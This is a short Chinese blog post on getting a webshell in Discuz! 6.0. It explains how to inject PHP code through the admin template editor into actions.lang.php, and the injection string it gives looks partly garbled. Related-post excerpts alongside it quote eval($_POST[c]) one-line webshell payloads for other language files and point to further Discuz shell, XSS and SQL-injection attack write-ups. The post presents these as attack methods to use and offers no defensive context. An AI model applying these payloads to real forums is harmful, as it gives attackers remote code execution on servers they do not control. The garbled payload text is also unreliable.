Discuz!6.0后台拿shell

最新推荐文章于 2025-12-15 13:25:28 发布
原创 最新推荐文章于 2025-12-15 13:25:28 发布 · 768 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#shell

本文介绍了一种通过编辑模板实现的代码注入攻击方式。以templates/default/actions.lang.php为例,展示了如何利用特定路径进行代码注入,成功植入并执行一句话木马。
导读:

  我记得以前看过这个资料,千翻万找总算翻了出来。
  这个前提是可以编辑模板,不然我估计是没什么希望了。
  templates/default/actions.lang.php(以这个为例)
  在最底那提交
  游客/');?>
  
  /'g/'=>/'sdfsdf
  便能写入一句话木马并正常执行.
discuz xss拿shell
Coisini的博客
05-26 1575
Discuz XSS得webshell By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<=6.1.0,gbk+utf+big5 新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效. ...
后台拿webshell的常用方法总结
1匹黑马
04-08 1624
后台拿webshell的常用方法总结 一、直接上传获得webshell 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blo...
[提权技术] Discuz! 6 后台Shell的方法
weixin_34367845的博客
06-29 319
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:) 1.后台编辑customfaq(customfaq.lang.php文件) 在 Copy code eval($_POST[c]); 2.后台编辑misc(misc.lang.php文件) 把post_reply_quote对应的内容改为 Copy code ";eval($_P...
Discuz! 6 后台Shell的方法
weixin_34405354的博客
01-29 92
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:) 1.后台编辑customfaq(customfaq.lang.php文件) 在 Copy code eval($_POST[c]); 2.后台编辑misc(misc.lang.php文件) 把post_reply_quote对应的内容改为 Copy code ";e...
Discuz!各版本拿Webshell
weixin_34313182的博客
04-01 1009
四个版本的漏洞,Discuz! 6.0 、7.0、7.2和X1.5。 传X1.5出0day,最后神马也木见……后t00ls大牛淫们发出了方法和EXP,围观下。 ———————————————– 作者:jsbug 原文地址 长文短说,但是却说来文长。 一、 Discuz! 6.0Discuz! 7.0 既然要后台Shell,文件写入必看。 /i...
Discuz!后台怎么拿到Webshell
Yatere的天平秤
04-25 2331
趁着地球还没毁灭,赶紧放出来。 预祝"单恋一枝花"童鞋生日快乐。 恭喜我的浩方Dota升到2级。 希望世界和平。 我不是标题党,你们敢踩我。敢踩我。。踩我。。。我…… 既然还没跪,我就从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。 一 Discuz! 6.0Discuz! 7.0 既然要后台Shell,文件写入必看。
mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)
weixin_29915703的博客
01-28 656
### 简要描述:Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它。这个漏洞应该是所有dz通杀的,我下载了最新版本的所以测试通过......### 详细说明:首先我们开启日志功能,然后存储一个xss看看:测试一个xss页面:[](https://images.seebug.or...
Discuz! 6.0-7.0后台Webshell漏洞利用教程
论坛软件不同版本(如2011年及其之前,包括6.0和7.0)的后台获取Webshell漏洞利用技术。Discuz!是一个流行的PHP论坛系统,其安全漏洞常常成为攻击者的目标。文章的核心焦点在于利用Discuz!扩展插件中的漏洞进行文件...
dz 所有版本后台GET SHELL1
08-08
6.0Discuz! 7.0 漏洞利用** 在这两个版本中,漏洞出现在后台的插件管理功能。通过控制`$plugin['identifier']`变量,可以尝试注入恶意代码。因为`identifier`是从`plugins`表中读取的,攻击者可以利用SQL注入...
DZ7.2 19楼蓝色风格定制版
03-09
1、已正确安装discuz!7.2的网站。 2、有一定量的图文数据。 3、对UChome的安装不作要求。 二、操作流程: 1、进入后台,在界面→边栏→全局中关闭边栏;在全局→论坛功能→主题评价中启用主题评价,使用两个...
安装php7.4.33的shell脚本
qq_34886696的博客
12-11 177
本文介绍了一个用于CentOS 7系统的PHP 7.4.33自动化部署脚本。该脚本包含完整的安装流程:检查系统环境、创建必要目录、安装依赖库、下载并编译PHP源码、配置PHP和PHP-FPM、创建systemd服务文件、优化系统参数等。脚本支持安装常用PHP扩展如Redis、ImageMagick,并包含安全配置和性能优化选项。安装完成后会生成测试脚本phpinfo.php,方便验证PHP是否正常运行。
Kubernetes 持久化存储与特殊容器
2503_92914039的博客
12-10 465
在 Kubernetes 集群中,容器的生命周期是短暂的,当 Pod 被删除或重启时,容器内的数据会随之丢失。对于 MySQL、Redis 等需要持久化数据的应用来说,持久化存储至关重要。同时,Kubernetes 还提供了特殊容器来应对特定场景的需求,本文将详细介绍这些内容。
HTB Dog writeup(账号版本需留意,突破系统显神通)
nihao_ma_的博客
12-11 496
HTB Dog靶机攻击摘要 该靶机暴露了SSH(22)和HTTP(80)端口。通过信息收集发现网站使用Backdrop CMS框架,并存在.git信息泄露漏洞。利用git-dumper工具获取源代码后,在settings.php文件中发现数据库凭据:root:BackDropJ2024DS2024。此外还收集到可能的用户名tiffany@dog.htb。攻击路径包括:1) 利用泄露的.git信息获取敏感数据;2) 密码复用尝试;3) 可能的sudo提权途径。后续可利用获取的凭据尝试SSH登录或进一步渗透。
VS Code终端从入门到精通完全指南
码事漫谈
12-11 1803
当前,Visual Studio Code的集成终端已成为开发者日常工作中不可或缺的工具。它不仅能运行 、 和 等命令,还与编辑器深度集成,支持工作区文件链接和错误检测等功能。无论你是使用Bash、Zsh还是PowerShell,VS Code终端都能满足你的需求。打开终端的三种方式:终端默认工作目录为当前打开的VS Code项目根目录,这意味着你可以直接运行与项目相关的命令,无需额外切换路径。VS Code终端提供丰富的交互功能,让你能够高效地与命令输出进行交互。命令通常会输出文件路径或URL,你只需
Shell脚本中变量默认值赋值总结
最新发布
zhaominyong的专栏
12-15 250
【代码】Shell脚本中变量默认值赋值总结。
告别 Shell 脚本:用 Laravel Envoy 实现干净可复用的部署
qq_31470439的博客
12-12 754
文章摘要: Laravel Envoy 是一个解决传统 Shell 部署脚本问题的工具,它通过类 PHP 语法提供更清晰、可维护的部署流程。Envoy 允许开发者将复杂的 bash 脚本拆分为多个命名任务,组合成可复用的 story,并支持多环境部署。相比传统 shell 脚本,Envoy 提供了更好的结构组织、变量管理、任务分组和错误处理能力。文章详细介绍了如何从 shell 脚本迁移到 Envoy,包括安装配置、任务拆分、环境变量管理和任务组合等关键步骤,帮助开发者实现更干净、可维护的部署流程。
系统核心解析:深入操作系统内部机制——基础I/O探秘:文件描述符、重定向与Shell的I/O魔法(一)
2401_82924480的博客
12-15 539
系统核心解析:深入操作系统内部机制——基础I/O探秘:文件描述符、重定向与Shell的I/O魔法(一)
安装redis7.2.4的shell脚本
qq_34886696的博客
12-11 219
该脚本是一个用于在CentOS 7系统上自动化部署Redis最新稳定版的Shell脚本。主要功能包括:自动获取Redis最新版本号、创建专用用户和目录、安装编译依赖、下载并编译Redis源码、优化系统参数、配置Redis服务、设置防火墙规则等。脚本采用模块化设计,包含日志记录、错误处理、系统检测等功能,并最终生成systemd服务实现开机自启。部署完成后会显示安装信息,包括Redis版本、安装路径、服务状态等关键信息。脚本默认安装Redis 7.2.4版本,支持自定义配置参数。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值